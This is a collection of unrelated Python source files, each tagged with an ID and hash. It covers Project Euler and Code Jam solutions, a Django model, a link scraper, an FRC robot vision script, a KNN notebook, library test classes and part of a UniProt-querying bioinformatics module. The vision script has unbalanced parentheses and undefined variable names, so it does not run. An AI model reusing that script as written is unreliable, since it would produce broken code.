maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
download_url=DOWNLOAD_URL,
project_urls=PROJECT_URLS,
long_description=LONG_DESCRIPTION,
classifiers=CLASSIFIERS,
platforms="any",
cmdclass=cmdclass,
packages=find_packages(),
package_data=package_data,
distclass=BinaryDistribution,
include_package_data=False, # True will install all files in repo
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
zip_safe=False,
python_requires=">=3.8",
)
# Clean-up copied files
for copy in FILES_COPIED_TO_PACKAGE:
os.unlink(copy)
|
18,708 | c058cad846f785052450b6e72cbf90fca6ff3726 | def main():
cases = parse_input()
for i, N in cases:
r = solve(N)
print(f'Case #{i}: {r}')
def parse_input():
T = int(input())
for i in range(1, T + 1):
N = int(input())
yield i, N
def solve(N):
if N == 0:
return 'INSOMNIA'
x = 0
digits = set()
while len(digits) < 10:
x += N
digits |= set(str(x))
return x
if __name__ == '__main__':
main()
|
18,709 | 551a024d06e6490da3c41824d305bb0bc48ec554 | #!/usr/bin/python
from euler.EulerUtils import add, isPermutation, isPrime, isGreater, multiply, isPerfectSquare
from euler.EulerUtils import primes
import math
import sys
from scipy.signal.waveforms import square
def euler7():
primesList=[]
counter=2
while 1:
if isPrime(counter):
primesList.append(counter)
counter += 1
if len(primesList) == 10001:
break
print primesList[-1]
def euler8():
L = []
L.append("73167176531330624919225119674426574742355349194934")
L.append("96983520312774506326239578318016984801869478851843")
L.append("85861560789112949495459501737958331952853208805511")
L.append("12540698747158523863050715693290963295227443043557")
L.append("66896648950445244523161731856403098711121722383113")
L.append("62229893423380308135336276614282806444486645238749")
L.append("30358907296290491560440772390713810515859307960866")
L.append("70172427121883998797908792274921901699720888093776")
L.append("65727333001053367881220235421809751254540594752243")
L.append("52584907711670556013604839586446706324415722155397")
L.append("53697817977846174064955149290862569321978468622482")
L.append("83972241375657056057490261407972968652414535100474")
L.append("82166370484403199890008895243450658541227588666881")
L.append("16427171479924442928230863465674813919123162824586")
L.append("17866458359124566529476545682848912883142607690042")
L.append("24219022671055626321111109370544217506941658960408")
L.append("07198403850962455444362981230987879927244284909188")
L.append("84580156166097919133875499200524063689912560717606")
L.append("05886116467109405077541002256983155200055935729725")
L.append("71636269561882670428252483600823257530420752963450")
numbers = list(''.join(L))
productList = []
print numbers
for index_i in range(len(numbers)):
if index_i > len(numbers)-5:
break
number=[int(j) for j in numbers[index_i:index_i+5]]
print number, index_i
productList.append(reduce(multiply,number))
print reduce(isGreater,productList)
def euler9():
# a2 + b2 = c2; a+b+c=1000
squaresList=[]
for i in range(4,1000000):
if isPerfectSquare(i):
squaresList.append(i)
for i in squaresList:
for jIndex in range(squaresList.index(i)+1, len(squaresList)):
j=squaresList[jIndex]
potentialK=i+j
if potentialK in squaresList and math.sqrt(i)+math.sqrt(j)+math.sqrt(potentialK) ==1000:
print math.sqrt(i)*math.sqrt(j)*math.sqrt(potentialK)
def euler10():
sum=0
for i in range(200000):
if isPrime(i):
sum += i
print sum
def euler10_():
returnList = primes(2000000)
# print returnList
print reduce(add,returnList)
def main():
# Command line args are in sys.argv[1], sys.argv[2] ..
# sys.argv[0] is the script name itself and can be ignored
# euler7()
# euler8()
# euler9()
euler10_()
if __name__ == '__main__':
main()
|
18,710 | a7226ccfe8173f87fe3027c4302e806b5fcff5bc | from django.db import models
class Word(models.Model):
""" Model for word base
"""
name = models.CharField(
max_length=128,
blank=False,
verbose_name="Word's name",
)
def __str__(self):
return '{0}'.format(self.name)
|
18,711 | bfe40ee4373711eed54b14e624326e07e383ca2e | #coding:utf-8
#siddontang@gmail.com
import traceback
from sgmllib import SGMLParser
class URLLister(SGMLParser):
def __init__(self):
SGMLParser.__init__(self)
self._clear()
def feed(self, data):
try:
SGMLParser.feed(self, data)
except Exception:
print 'SGMLParser error %s' % traceback.format_exc()
def reset(self):
SGMLParser.reset(self)
self._clear()
def getUrls(self):
return self._urls
def getImgs(self):
return self._imgs
def _clear(self):
self._urls = []
self._imgs = []
def start_a(self, attrs):
href = [ v for k,v in attrs if k=="href" and v.startswith("http")]
if href:
self._urls.extend(href)
def start_img(self, attrs):
src = [ v for k,v in attrs if k=="src" and v.startswith("http") ]
if src:
self._imgs.extend(src)
if __name__ == '__main__':
import urllib2
try:
f = urllib2.urlopen('http://www.qq.com').read()
urlLister = URLLister()
urlLister.feed(f)
urls = urlLister.getUrls()
imgs = urlLister.getImgs()
for img in imgs:
print img
except urllib2.URLError, e:
print e.reason
|
18,712 | cbefee282dc0db920978239628d593a2b521a0f8 | #!/usr/bin/python
#Team3238 Cyborg Ferrets 2014 Object Detection Code
#Start with
#python image_processor.py 'path/to/image.jpg'
#don't pass an image argument to use the VideoCapture(0) stream.
# Video capture mode updates the frame to process every video_pause milliseconds, so adjust that.
#set enable_dashboard = True to send range and bearing over smart dashboard network_tables interface.
#set show_windows = False for on-robot, no monitor processing on pandaboard.
#This code is a merge of vision_lib.py, bearing_formula.py, distance_formula.py and team341 java vision detection code from (2012?) competition.
#java -jar SmartDashboard ip 127.0.0.1, for example, will start the dashboard if running on this same host.
#Now tuned for green leds.
#expected camera settings (sorry no numbers on camera interface.)
# exposure -> far right
# gain -> far left
# brightness ~ 20% from left
# contrast ~ 20% from left
# color intensity ~ 18% from left
enable_dashboard = True
show_windows = False
window_scale = 0.5
window_size = (int(640*window_scale), int(480*window_scale))
from cv2 import *
import numpy as np
import sys
import math
import commands
if enable_dashboard:
from pynetworktables import *
if enable_dashboard:
SmartDashboard.init()
#pretend the robot is on the network reporting its heading to the SmartDashboard,
# then let the SmartDashboard user modify it and send it back to this code to simulate movement.
camera_exposure_title = 'Camera Exposure:'
class ImageProcessor:
#all these values could be put into the SmartDashboard for live tuning as conditions change.
default_shape = (480,640,3)
h = np.zeros(default_shape, dtype=np.uint8)
s = np.zeros(default_shape, dtype=np.uint8)
v = np.zeros(default_shape, dtype=np.uint8)
combined = np.zeros(default_shape, dtype=np.uint8)
img = np.zeros(default_shape, dtype=np.uint8)
h_title = "hue"
s_title = "sat"
v_title = "val"
combined_title = "Combined + Morphed"
targets_title = "Targets"
#for video capture mode, what approx frame rate do we want? frame rate = approx video_pause + processing time
video_pause = 1 #0 milliseconds means wait for key press, waitKey takes an integer so 1 millisecond is minimal with this approach.
#tuned for the camera settings above and the green leds. (Red didn't work as well and requires changing the threshold function to use OR of inverse and normal threshold, because red is on the top and bottom of the hue scale (wraps around.).)
hue_delta = 15
sat_delta = 25
val_delta = 100
hue_thresh = 80
sat_thresh = 233
val_thresh = 212
max_thresh = 255
#used for the morphologyEx method that fills in the pixels in the combined image prior to identifying polygons and contours.
kernel = getStructuringElement(MORPH_RECT, (2,2), anchor=(1,1))
morph_close_iterations = 9
#colors in BGR format for drawing the targets over the image.
selected_target_color = (0,0,255)
passed_up_target_color = (255,0,0)
possible_target_color = (0,255,0)
#used to judge whether a polygon side is near vertical or near horizontal, for filtering out shapes that don't match expected target characteristics
vert_threshold = math.tan(math.radians(90-20))
horiz_threshold = math.tan(math.radians(20))
#used to look for only horizontal or vertical rectangles of an aspect ratio that matches the targets.
#currently open wide to find both horizontal and vertical targets
max_target_aspect_ratio = 10 # 1.0 # top target is expected to be 24.5 in x 4 in.
min_target_aspect_ratio = 0.1 #0.01# 3# 0.5
angle_to_robot = 0 #camera's 0 bearing to robot's 0 bearing
camera_offset_position = 0
morph_close_iterations = 9
angle_to_shooter = 0 #camera's 0 bearing to shooter's 0 bearing
camera_color_intensity = 0 #value subject to change
camera_saturation = 0 #value subject to change
camera_contrast = 0 #value subject to change
camera_color_hue = 0 #value subject to change
camera_brightness = 20 #value subject to change
camera_gain = 0 #value subject to change
camera_exposure = 20
robot_heading = 0.0 #input from SmartDashboard if enabled, else hard coded here.
x_resolution = 640 #needs to match the camera.
y_resolution = 480
#theta = math.radians(49.165) #half of field of view of the camera
# field_of_view_degrees = 53.0 horizontal field of view
field_of_view_degrees = 26.4382 # vertical field of view
theta = math.radians(field_of_view_degrees/2.0) #half of field of view of the camera, in radians to work with math.tan function.
# real_target_width = 24.5 #inches #24 * 0.0254 #1 inch / 0.254 meters target is 24 inches wide
real_target_height = 28.5 #using these constants and may not be correct for current robot configuration.
angle_to_shooter = 0
#not currently using these constants and may not be correct for current robot configuration.
# target_min_width = 20
# target_max_width = 200
# degrees_horiz_field_of_view = 47.0
# degrees_vert_field_of_view = 480.0/640*degrees_horiz_field_of_view
# inches_camera_height = 54.0
# inches_top_target_height = 98 + 2 + 98
# degrees_camera_pitch = 21.0
# degrees_sighting_offset = -1.55
def __init__(self, img_path):
self.img_path = img_path
self.layout_result_windows(self.h,self.s,self.v)
self.vc = VideoCapture(0)
SmartDashboard.PutNumber(angle_to_robot_title, self.angle_to_robot)
SmartDashboard.PutNumber(camera_offset_position_title, self.camera_offset_position)
SmartDashboard.PutNumber(morph_close_iterations_title, self.morph_close_iterations)
SmartDashboard.PutNumber(angle_to_shooter_title, self.angle_to_shooter)
SmartDashboard.PutNumber(camera_color_intensity_title, self.camera_color_intensity)
SmartDashboard.PutNumber(camera_exposure_title, self.camera_exposure)
SmartDashboard.PutNumber(camera_saturation.title, self.saturation)
SmartDashboard.PutNumber(camera_contrast_title, self.contrast)
SmartDashboard.PutNumber(camera_color_hue_title, self.camera_color_hue)
SmartDashboard.PutNumber(camera_brihtness_title, self.camera_brightness)
def video_feed(self):
while True:
if self.img is not None:
self.process()
if self.img_path is None:
rval, self.img = self.vc.read() #might set to None
else:
self.img = imread(self.img_path)
def process(self):
if enable_dashboard:
self.camera_saturation = int(SmartDashboard.GetNumber(camera_saturation_title)
self.angle_to_robot = int(SmartDashboard.GetNumber(angle_to_robot_title)
self.camera_offset_postion = int(SmartDashboard.GetNumber(camera_offset_position_title)
self.morph_close_iterations = int(SmartDashboard.GetNumber(morph_close_iterations_title)
self.angle_to_shooter = int(SmartDashboard.GetNumber(angle_to_shooter_title)
self.camera_color_intensity = int(SmartDashboard.GetNumber(camera_color_intensity_title)
self.camera_contrast = int(SmartDashboard.GetNumber(camera_contrast_title)
self.camera_color_hue = int(SmartDashboard.GetNumber(camera_color_hue_title)
self.camera_brightness = int(SmartDashboard.GetNumber(camera_brightness_title)
self.camera_exposure = int(SmartDashboard.GetNumber(camera_exposure_title)
self.camera_gain = int(SmartDashboard.GetNumber(camera_gain_title)
if self.img_path is None:
commands.getoutput(" yavta --set-control '0x009a0901 1' /dev/video0")
#print(commands.getoutput(" yavta --get-control '0x009a0901' /dev/video0") )
commands.getoutput("yavta --set-control '0x009a0902 %s' /dev/video0" % self.camera_exposure)
#print(commands.getoutput(" yavta --get-control '0x009a0902' /dev/video0"))
drawing = np.zeros(self.img.shape, dtype=np.uint8)
self.hsv = cvtColor(self.img, cv.CV_BGR2HSV)
self.h, self.s, self.v = split(self.hsv)
self.h_clipped = self.threshold_in_range(self.h, self.hue_thresh-self.hue_delta, self.hue_thresh+self.hue_delta)
self.s_clipped = self.threshold_in_range(self.s, self.sat_thresh-self.sat_delta, self.sat_thresh+self.sat_delta)
self.v_clipped = self.threshold_in_range(self.v, self.val_thresh-self.val_delta, self.val_thresh+self.val_delta)
if show_windows:
h_scaled = resize(self.h_clipped, window_size)
s_scaled = resize(self.s_clipped, window_size)
v_scaled = resize(self.v_clipped, window_size)
imshow(self.h_title, h_scaled)
imshow(self.s_title, s_scaled)
imshow(self.v_title, v_scaled)
self.find_targets()
if waitKey(self.video_pause) == ord('q'):
exit(1)
def layout_result_windows(self, h, s, v):
if show_windows:
pos_x, pos_y = 500,500
# imshow(self.img_path, self.img)
h_scaled = resize(h, window_size)
s_scaled = resize(s, window_size)
v_scaled = resize(v, window_size)
combined_scaled = resize(self.combined, window_size)
img_scaled = resize(self.img, window_size)
imshow(self.h_title , h_scaled)
imshow(self.s_title , s_scaled)
imshow(self.v_title , v_scaled)
imshow(self.combined_title, combined_scaled)
imshow(self.targets_title , img_scaled)
#moveWindow(self.h_title, pos_x*1, pos_y*0);
#moveWindow(self.s_title, pos_x*0, pos_y*1);
#moveWindow(self.v_title, pos_x*1, pos_y*1);
#moveWindow(self.combined_title, pos_x*2, pos_y*0);
#moveWindow(self.targets_title, pos_x*2, pos_y*1);
#these seem to be placed alphabetically....
# createTrackbar( "Hue High Threshold:", self.source_title, self.hue_high_thresh, self.max_thresh, self.update_hue_high_threshold);
# createTrackbar( "Hue Low Threshold:", self.source_title, self.hue_low_thresh, self.max_thresh, self.update_hue_low_threshold);
# createTrackbar( "Sat High Threshold:", self.source_title, self.sat_high_thresh, self.max_thresh, self.update_sat_high_threshold);
# createTrackbar( "Sat Low Threshold:", self.source_title, self.sat_low_thresh, self.max_thresh, self.update_sat_low_threshold);
# createTrackbar( "Val High Threshold:", self.source_title, self.val_high_thresh, self.max_thresh, self.update_val_high_threshold);
# createTrackbar( "Val Low Threshold:", self.source_title, self.val_low_thresh, self.max_thresh, self.update_val_low_threshold);
def update_hue_threshold(self, thresh):
delta = 15
self.h_clipped = self.threshold_in_range(self.h, thresh-delta, thresh+delta)
imshow(self.h_title, self.h_clipped)
self.find_targets()
def update_sat_threshold(self, thresh):
delta = 25
self.s_clipped = self.threshold_in_range(self.s, thresh-delta, thresh+delta)
imshow(self.s_title, self.s_clipped)
self.find_targets()
def update_val_threshold(self, thresh):
delta = 100
self.v_clipped = self.threshold_in_range(self.v, thresh-delta, thresh+delta)
imshow(self.v_title, self.v_clipped)
self.find_targets()
def threshold_in_range(self, img, low, high):
unused, above = threshold(img, low, self.max_thresh, THRESH_BINARY)
unused, below = threshold(img, high, self.max_thresh, THRESH_BINARY_INV)
return bitwise_and(above, below)
def find_targets(self):
#combine all the masks together to get their overlapping regions.
if True:
self.reset_targeting()
self.combined = bitwise_and(self.h_clipped, bitwise_and(self.s_clipped, self.v_clipped))
#comment above line and uncomment next line to ignore hue channel til we sort out red light hue matching around zero.
#self.combined = bitwise_and(self.s_clipped, self.v_clipped)
self.combined = morphologyEx(src=self.combined, op=MORPH_CLOSE, kernel=self.kernel, iterations=self.morph_close_iterations)
if show_windows:
combined_scaled = resize(self.combined, window_size)
imshow(self.combined_title, combined_scaled )
self.contoured = self.combined.copy()
contours, heirarchy = findContours(self.contoured, RETR_LIST, CHAIN_APPROX_TC89_KCOS)
#print("number of contours found = "+str(len(contours)))
#contours = [convexHull(c.astype(np.float32),clockwise=True,returnPoints=True) for c in contours]
#
polygon_tuples = self.contours_to_polygon_tuples(contours)
polygons = [self.unpack_polygon(t) for t in polygon_tuples]
for polygon_tuple in polygon_tuples:
self.mark_correct_shape_and_orientation(polygon_tuple)
if self.selected_target is not None:
self.draw_target(self.lowest_found_so_far_x, self.lowest_found_so_far, self.selected_target_color)
drawContours(self.drawing, contours, -1, self.selected_target_color, thickness=10)
# drawContours(self.drawing, [self.unpack_polygon(self.selected_target).astype(np.int32)], -1, self.selected_target_color, thickness=10)
self.aim()
if show_windows:
drawing_scaled = resize(self.drawing, window_size)
imshow(self.targets_title, drawing_scaled)
if enable_dashboard:
SmartDashboard.PutNumber("Potential Targets:", len(polygons))
print("Potential Targets:", len(polygons))
def aim(self):
if enable_dashboard:
self.robot_heading = SmartDashboard.GetNumber(robot_heading_title)
polygon, x, y, w, h = self.selected_target
self.target_bearing = self.get_bearing(x + w/2.0)
self.target_range = self.get_range(x, y, w, h)
#self.target_elevation = self.get_elevation(x, y, w, h)
print("Range = " + str(self.target_range))
print("Bearing = " + str(self.target_bearing))
if enable_dashboard:
SmartDashboard.PutNumber("Target Range:", self.target_range)
SmartDashboard.PutNumber("Target Bearing:", self.target_bearing)
SmartDashboard.PutNumber("Target Elevation:",self.target_elevation)
SmartDashboard.PutString("Target: ","Acquired!")
def get_bearing(self, target_center_x):
return (self.field_of_view_degrees/self.x_resolution)*(target_center_x-(self.x_resolution/2))-self.angle_to_shooter
def get_range(self, x, y, w, h):
if enable_dashboard:
SmartDashboard.PutNumber("TargetWidth: ",w)
SmartDashboard.PutNumber("TargetHeight",h)
SmartDashboard.PutNumber("TargetX",x)
SmartDashboard.PutNumber("TargetY",y)
return self.distance(h)
def distance(self, pix_height):
fovr = self.x_resolution * self.real_target_height / pix_height
if enable_dashboard:
SmartDashboard.PutNumber("FieldOfViewReal", fovr) # = 2w_real
SmartDashboard.PutNumber("TanTheta", math.tan(self.theta))
SmartDashboard.PutNumber("fovr/tan(theta)", fovr/math.tan(self.theta))
return self.real_target_height*self.y_resolution/(2*pix_height*math.tan(self.theta))
def reset_targeting(self):
if enable_dashboard:
SmartDashboard.PutString("Target: ","lost...")
self.drawing = self.img.copy()
self.selected_target = None
self.lowest_found_so_far_x = None
self.lowest_found_so_far = 0
self.target_range = 0
self.target_bearing = -1
self.target_elevation = 0
def mark_correct_shape_and_orientation(self, polygon_tuple):
p,x,y,w,h = polygon_tuple
if True: #isContourConvex(p) and 4==len(p) and self.slope_angles_correct(p):
center_x = int(x + w/2.0)
center_y = int(y + h/2.0)
self.draw_target(center_x, center_y, self.possible_target_color)
if center_y > self.lowest_found_so_far:
self.selected_target = polygon_tuple
self.lowest_found_so_far = center_y
self.lowest_found_so_far_x = center_x
else:
drawContours(self.drawing, [p.astype(np.int32)], -1, self.passed_up_target_color, thickness=7)
def draw_target(self, center_x, center_y, a_color):
#circle(self.drawing,(center_x, center_y), radius=10, color=self.selected_target_color, thickness=5)
radius = 10
a_thickness = 5
line(self.drawing, (center_x - radius, center_y), (center_x + radius, center_y), color=a_color, thickness=a_thickness)
line(self.drawing, (center_x, center_y-radius), (center_x, center_y+radius), color=a_color, thickness=a_thickness)
def slope_angles_correct(self, polygon):
num_near_vert, num_near_horiz = 0,0
for line_starting_point_index in xrange(0,4):
slope = self.get_slope(polygon, line_starting_point_index)
if slope < self.horiz_threshold:
num_near_horiz += 1
if slope > self.vert_threshold:
num_near_vert += 1
return 1 <= num_near_horiz and 2 == num_near_vert
def get_slope(self, p, line_starting_point_index):
line_ending_point_index = (line_starting_point_index+1)%4
dy = p[line_starting_point_index, 0, 1] - p[line_ending_point_index, 0, 1]
dx = p[line_starting_point_index, 0, 0] - p[line_ending_point_index, 0, 0]
slope = sys.float_info.max
if 0 != dx:
slope = abs(float(dy)/dx)
return slope
def unpack_polygon(self,t):
p,x,y,w,h = t
return p
def contours_to_polygon_tuples(self, contours):
polygon_tuples = []
for c in contours:
x, y, w, h = boundingRect(c)
if self.aspect_ratio_and_size_correct(w,h):
p = approxPolyDP(c, 20, False)
polygon_tuples.append((p,x,y,w,h))
return polygon_tuples
def aspect_ratio_and_size_correct(self, width, height):
ratio = float(width)/height #float(height)/width
return ratio < self.max_target_aspect_ratio and ratio > self.min_target_aspect_ratio #and width > self.target_min_width and width < self.target_max_width
#note: we don't want to ignore potential targets based on pixel width and height since range will change the pixel coverage of a real target.
if '__main__'==__name__:
try:
img_path = sys.argv[1]
except:
img_path= None
# print('Please add an image path argument and try again.')
# sys.exit(2)
ImageProcessor(img_path).video_feed()
|
18,713 | a4d451f6d3613c1a257027d90d47e40d681ab56f | import pygame
pygame.init()
display_width = 800
display_length = 600
black = (0,0,0)
white = (255,255,255)
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
gameDisplay = pygame.display.set_mode((display_width,display_length))
pygame.display.set_caption('ass')
clock = pygame.time.Clock()
crashed = False
while not crashed:
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
print(event)
pygame.display.update() #pygame.display.flip()
clock.tick(60)
pygame.quit()
quit()
|
18,714 | dc3a52f38095cda91c52d636a043cb701a299f22 |
# coding: utf-8
# In[30]:
import os
# In[31]:
os.getcwd()
# In[32]:
os.chdir("C:/Users/Dheeraj B/Desktop/dataset")
# In[33]:
ls
# In[34]:
import pandas as pd
import numpy as np
# In[35]:
from sklearn.neighbors import KNeighborsClassifier
# In[36]:
df = pd.read_csv("votes.csv")
# In[37]:
df.info()
# In[38]:
knn = KNeighborsClassifier(n_neighbors=5)
# In[39]:
df.head()
# In[40]:
X = df.drop(["party"], axis=1)
# In[41]:
Y = df["party"]
# In[42]:
X.shape
# In[43]:
Y.shape
# In[48]:
from sklearn.preprocessing import LabelEncoder
# In[49]:
df = df.apply(LabelEncoder().fit_transform)
# In[50]:
df.head()
# In[52]:
X = df.drop(["party"], axis=1)
Y = df["party"]
# In[54]:
knn.fit(X,Y)
# In[55]:
train = df.iloc[:400]
# In[56]:
test= df.iloc[400:]
# In[66]:
# Create arrays for the features and the response variables
y = train["party"].values
x= train.drop('party',axis=1).values
# In[67]:
model1 = knn.fit(X,Y)
# In[69]:
y_test = test["party"]
test_pred = test.drop(["party"], axis =1)
# In[70]:
y_pred = model1.predict(test_pred)
# In[71]:
y_pred
# In[72]:
y_test
# In[73]:
list(y_pred)
# In[74]:
mis_classified = []
for x ,y in zip(y_test,y_pred):
if x!=y:
mis_classified.append(x)
print (1-(len(mis_classified)/len(y_test)))
# In[75]:
df.head()
|
18,715 | 8d4a720b261270a1304378662c34e84a6a49ecf9 | """
This holds a series of classes specifically designed to test
results in a deterministic way.
"""
import xcomposite
class DecoratorBase(xcomposite.Composition):
"""
Each decorator is represented by a function. All of which
will return 1 or 'A' (in whatever expected form).
"""
@xcomposite.take_min
def min(self):
return 1
@xcomposite.take_max
def max(self):
return 1
@xcomposite.take_sum
def sum(self):
return 1
@xcomposite.take_first
def first(self):
return 'A'
@xcomposite.take_last
def last(self):
return 'A'
@xcomposite.append_results
def append(self):
return 'A'
@xcomposite.append_unique
def append_unique(self):
return 'X'
@xcomposite.extend_results
def extend_list(self):
return ['A']
@xcomposite.take_average
def average(self):
return 1.0
@xcomposite.update_dictionary
def update(self):
return dict(foo=1)
class DecoratorTesterA(DecoratorBase):
"""
Each decorator is represented by a function. All of which
will return 1 or 'A' (in whatever expected form).
"""
def min(self):
return 1
def max(self):
return 1
def sum(self):
return 1
def first(self):
return 'A'
def last(self):
return 'A'
def append(self):
return 'A'
def append_unique(self):
return 'X'
def extend_list(self):
return ['A']
def average(self):
return 1.0
def update(self):
return dict(foo=1)
class DecoratorTesterB(xcomposite.Composition):
"""
Each decorator is represented by a function. All of which
will return 2 or 'B' (in whatever expected form).
"""
def min(self):
return 2
def max(self):
return 2
def sum(self):
return 2
def first(self):
return 'B'
def last(self):
return 'B'
def append(self):
return 'B'
def append_unique(self):
return 'X'
def extend_list(self):
return ['B']
def average(self):
return 2.0
def update(self):
return dict(bar=1)
# ------------------------------------------------------------------------------
class UndecoratedTesterA(xcomposite.Composition):
def undecorated(self):
return 1
# ------------------------------------------------------------------------------
class UndecoratedTesterB(xcomposite.Composition):
def undecorated(self):
return 2
# ------------------------------------------------------------------------------
class PartiallyDecoratedTesterA(xcomposite.Composition):
@xcomposite.take_max
def test(self):
return 1
# ------------------------------------------------------------------------------
class PartiallyDecoratedTesterB(xcomposite.Composition):
def test(self):
return 2
|
18,716 | 1beab001ed0c59099b5deeb4617e489959dc274b | #Anneliek ter Horst, 2017
# imports
import csv
import sys
import pandas as pd
import time
from collections import Counter
from collections import defaultdict
df = pd.DataFrame.from_csv(sys.argv[1]).reset_index()
df.columns= ['index', 'counts' ,'species', 'family']
df2 = df.groupby('family')['counts'].sum()
# df2 = df['family'].value_counts()
# df2 = pd.DataFrame.from_csv(sys.argv[2]).reset_index()
#
# df3 = df1.merge(df2, how='left', on='species')[['counts', 'species', 'family']].fillna('Unclassified')
#
df2.to_csv(sys.argv[2])
|
18,717 | d92351e74f1a7c36f11612e0a9fd7fb07a5b31ac | #def write_repeat (message, n):
# for i in range (n):
# print (message)
#write_repeat ("Hello", 5)
def hof_write_repeat (message, n, action):
for i in range (n):
action (message)
hof_write_repeat ("Hello", 5, print)
# Import the logging library
import logging
# Log the output as an error instead
hof_write_repeat ("hello", 5, logging.error) |
18,718 | 032be867556a3560836e11b51f6d7dcaa693b9c9 | # -*- coding: utf-8 -*-
"""
MOSCA's Annotation package for Gene Calling and
Alignment of identified ORFs to UniProt database
By João Sequeira
Jun 2017
"""
from diamond import DIAMOND
from mosca_tools import MoscaTools
from uniprot_mapping import UniprotMapping
from progressbar import ProgressBar
from io import StringIO
from tqdm import tqdm
import pandas as pd
import numpy as np
import time, os, shutil, glob, urllib.request, urllib.parse, urllib.error,urllib.request,urllib.error,urllib.parse
mtools = MoscaTools()
upmap = UniprotMapping()
class Annotater:
def __init__ (self, **kwargs):
self.__dict__ = kwargs
'''
Input:
file: name of input file to perform gene calling on
output: basename of output files
assembled: True if input is contigs, False if it are reads
error_model: quality model to consider when input are reads
Output:
FragGeneScan output files will be produced with basename 'output + /fgs'
If input is FASTQ reads (if assembled == False) a FASTA version will
be produced in the same folder with the same name as the FASTQ file
(but with .fasta instead of .fastq)
'''
def gene_calling(self, file, output, assembled = True, error_model = 'illumina_10'):
bashCommand = 'run_FragGeneScan.pl -genome='
if assembled:
bashCommand += file + ' -out=' + output + '/fgs -complete=1 -train=./complete'
else:
mtools.fastq2fasta(file, file.replace('fastq', 'fasta')) # fraggenescan only accepts FASTA input
bashCommand += (file.replace('fastq', 'fasta') + ' -out=' + output +
'/fgs -complete=0 -train=./' + error_model)
bashCommand += ' -thread=' + self.threads
mtools.run_command(bashCommand)
def annotation(self):
diamond = DIAMOND(threads = self.threads,
db = self.db,
out = self.out_dir + '/Annotation/' + self.name + '/aligned.blast',
query = self.out_dir + '/Annotation/' + self.name + '/fgs.faa',
un = self.out_dir + '/Annotation/' + self.name + '/unaligned.fasta',
unal = '1',
max_target_seqs = '1')
if self.db[-6:] == '.fasta':
print('FASTA database was inputed')
if not os.path.isfile(self.db.replace('fasta','dmnd')):
print('DMND database not found. Generating a new one')
diamond.set_database(self.db, self.db.replace('fasta','dmnd'))
else:
print('DMND database was found. Using it')
elif self.db[-5:] != '.dmnd':
print('Database must either be a FASTA (.fasta) or a DMND (.dmnd) file')
exit()
diamond.db = self.db.split('.dmnd')[0] if '.dmnd' in self.db else self.db.split('.fasta')[0]
diamond.run()
'''
Input:
ids: list of UniProt IDs to query
original_database: database from where the IDs are
database_destination: database to where to map (so far, only works with 'ACC'
output_format: format of response to get
columns: names of UniProt columns to get info on
databases: names of databases to cross-reference with
Output:
Returns the content of the response from UniProt
'''
def uniprot_request(self, ids, original_database = 'ACC+ID', database_destination = '',
output_format = 'tab', columns = None, databases = None):
base_url = 'https://www.uniprot.org/uploadlists/'
params = {
'from':original_database,
'format':output_format,
'query':' '.join(ids),
'columns':upmap.string4mapping(columns = columns, databases = databases)
}
if database_destination != '' or original_database == 'ACC+ID':
params['to'] = 'ACC'
data = urllib.parse.urlencode(params).encode("utf-8")
request = urllib.request.Request(base_url, data)
response = urllib.request.urlopen(request)
return response.read().decode("utf-8")
'''
Input:
ids: list of UniProt IDs to query
original_database: database from where the IDs are
output_format: format of response to get
database_destination: database to where to map (so far, only works with 'ACC'
chunk: INT, number of IDs to send per request
sleep: INT, number of seconds to wait between requests
columns: names of UniProt columns to get info on
databases: names of databases to cross-reference with
Output:
If output format is 'tab', a pd.DataFrame will be returned with the information
about the IDs queried.
If output format is 'fasta', a Str containing the fasta sequences and headers
of the proteis belonging to the IDs queried will be returned.
'''
def get_uniprot_information(self, ids, original_database = 'ACC+ID', output_format = 'tab',
database_destination = '', chunk = 1000, sleep = 30,
columns = None, databases = None):
pbar = ProgressBar()
print('Retrieving UniProt information from ' + str(len(ids)) + ' IDs.')
if output_format == 'tab':
result = pd.DataFrame()
for i in pbar(range(0, len(ids), chunk)):
j = i + chunk if i + chunk < len(ids) else len(ids)
try:
data = self.uniprot_request(ids[i:j], original_database,
database_destination, columns = columns,
databases = databases)
if len(data) > 0:
uniprotinfo = pd.read_csv(StringIO(data), sep = '\t')
result = pd.concat([result, uniprotinfo[uniprotinfo.columns.tolist()[:-1]]]) # last column is uniprot_list
time.sleep(sleep)
except:
return result
elif output_format == 'fasta':
result = str()
for i in pbar(range(0, len(ids), chunk)):
j = i + chunk if i + chunk < len(ids) else len(ids)
data = self.uniprot_request(ids[i:j], original_database,
database_destination, output_format = output_format)
if len(data) > 0:
result += data
time.sleep(sleep)
return result
def recursive_uniprot_fasta(self, output, fasta = None, blast = None, max_iter = 5):
if fasta is not None:
fasta = mtools.parse_fasta(fasta)
all_ids = list(set(fasta.keys()))
elif blast is not None:
blast = mtools.parse_blast(blast)
all_ids = list(set([ide.split('|')[1] if ide != '*' else ide
for ide in blast.sseqid]))
i = 0
ids_done = ([ide.split('|')[1] for ide in mtools.parse_fasta(output).keys()]
if os.path.isfile(output) else list())
while len(ids_done) < len(all_ids) and i < max_iter:
print('Checking which IDs are missing information.')
pbar = ProgressBar()
ids_missing = list(set([ide for ide in pbar(all_ids) if ide not in ids_done]))
print('Information already gathered for ' + str(len(ids_done)) +
' ids. Still missing for ' + str(len(ids_missing)) + '.')
uniprotinfo = self.get_uniprot_information(ids_missing,
output_format = 'fasta')
with open(output, 'a') as file:
file.write(uniprotinfo)
ids_done = [ide.split('|')[1] for ide in mtools.parse_fasta(output).keys()]
i += 1
if len(ids_done) == len(all_ids):
print('Results for all IDs are available at ' + output)
else:
ids_unmapped_output = '/'.join(output.split('/')[:-1]) + '/ids_unmapped.txt'
handler = open(ids_unmapped_output, 'w')
handler.write('\n'.join(ids_missing))
print(str(i) + ' iterations were made. Results related to ' + str(len(ids_missing)) +
' IDs were not obtained. IDs with missing information are available' +
' at ' + ids_unmapped_output + ' and information obtained is available' +
' at ' + output)
def recursive_uniprot_information(self, blast, output, max_iter = 5,
columns = None, databases = None):
if os.path.isfile(output):
result = pd.read_csv(output, sep = '\t', low_memory=False).drop_duplicates()
ids_done = list(set(result['Entry']))
else:
print(output + ' not found.')
ids_done = list()
result = pd.DataFrame()
all_ids = set([ide.split('|')[1] for ide in mtools.parse_blast(blast)['sseqid'] if ide != '*'])
tries = 0
